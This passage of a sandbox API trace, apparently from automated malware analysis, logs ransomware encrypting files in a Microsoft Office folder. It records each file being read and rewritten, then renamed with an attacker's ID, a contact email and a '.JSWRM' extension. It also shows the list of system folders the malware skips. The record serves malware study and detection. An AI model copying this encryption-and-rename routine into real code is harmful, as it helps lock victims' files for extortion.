dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0140.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0140.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0140.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0140.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0140.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.926] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGAD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgad.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGAD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgad.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0140.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0140.927] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5269, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGATNGET.DPV", cAlternateFileName="")) returned 1 [0140.927] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2=".") returned 1 [0140.927] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="..") returned 1 [0140.927] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="...") returned 1 [0140.928] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="windows") returned -1 [0140.928] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="recovery") returned -1 [0140.928] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="perflogs") returned -1 [0140.928] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="documents and settings") returned -1 [0140.928] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.928] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="system volume information") returned -1 [0140.928] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="msocache") returned -1 [0140.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0140.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGATNGET.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGATNGET.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGATNGET.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0140.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0140.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGATNGET.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGATNGET.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGATNGET.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0140.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0140.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0140.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0140.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGATNGET.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgatnget.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.929] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21097) returned 1 [0140.929] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5260) returned 0x27b348 [0140.929] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x5260, lpOverlapped=0x0) returned 1 [0140.932] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.932] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x5260, lpOverlapped=0x0) returned 1 [0140.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.932] CloseHandle (hObject=0x238) returned 1 [0140.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0140.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0140.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0140.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0140.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0140.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0140.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0140.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0140.933] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGATNGET.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgatnget.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGATNGET.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgatnget.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0140.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0140.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0140.935] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc702687, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc702687, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x145a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGATNGET.XML", cAlternateFileName="")) returned 1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2=".") returned 1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="..") returned 1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="...") returned 1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="windows") returned -1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="recovery") returned -1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="perflogs") returned -1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="documents and settings") returned -1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="system volume information") returned -1 [0140.935] lstrcmpiW (lpString1="DGATNGET.XML", lpString2="msocache") returned -1 [0140.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0140.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGATNGET.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGATNGET.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGATNGET.XML", lpUsedDefaultChar=0x0) returned 12 [0140.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0140.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0140.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGATNGET.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGATNGET.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGATNGET.XML", lpUsedDefaultChar=0x0) returned 12 [0140.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0140.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0140.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0140.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0140.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGATNGET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgatnget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.937] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5210) returned 1 [0140.937] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1450) returned 0x27b348 [0140.937] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1450, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1450, lpOverlapped=0x0) returned 1 [0140.939] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.939] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1450, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1450, lpOverlapped=0x0) returned 1 [0140.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.939] CloseHandle (hObject=0x238) returned 1 [0140.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0140.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0140.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0140.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0140.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0140.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0140.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0140.940] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGATNGET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgatnget.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGATNGET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgatnget.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0140.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0140.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0140.941] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGBARBLL.DPV", cAlternateFileName="")) returned 1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2=".") returned 1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="..") returned 1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="...") returned 1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="windows") returned -1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="recovery") returned -1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="perflogs") returned -1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="documents and settings") returned -1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="system volume information") returned -1 [0140.941] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="msocache") returned -1 [0140.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0140.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBARBLL.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBARBLL.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBARBLL.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0140.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0140.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBARBLL.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBARBLL.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBARBLL.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0140.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0140.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0140.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0140.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBARBLL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgbarbll.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.942] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3584) returned 1 [0140.942] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe00) returned 0x24e1d8 [0140.942] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe00, lpOverlapped=0x0) returned 1 [0140.944] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.944] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe00, lpOverlapped=0x0) returned 1 [0140.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0140.944] CloseHandle (hObject=0x238) returned 1 [0140.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0140.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0140.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBARBLL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgbarbll.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBARBLL.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgbarbll.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.946] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3bb225, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc3bb225, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc702687, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x456, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGBARBLL.XML", cAlternateFileName="")) returned 1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2=".") returned 1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="..") returned 1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="...") returned 1 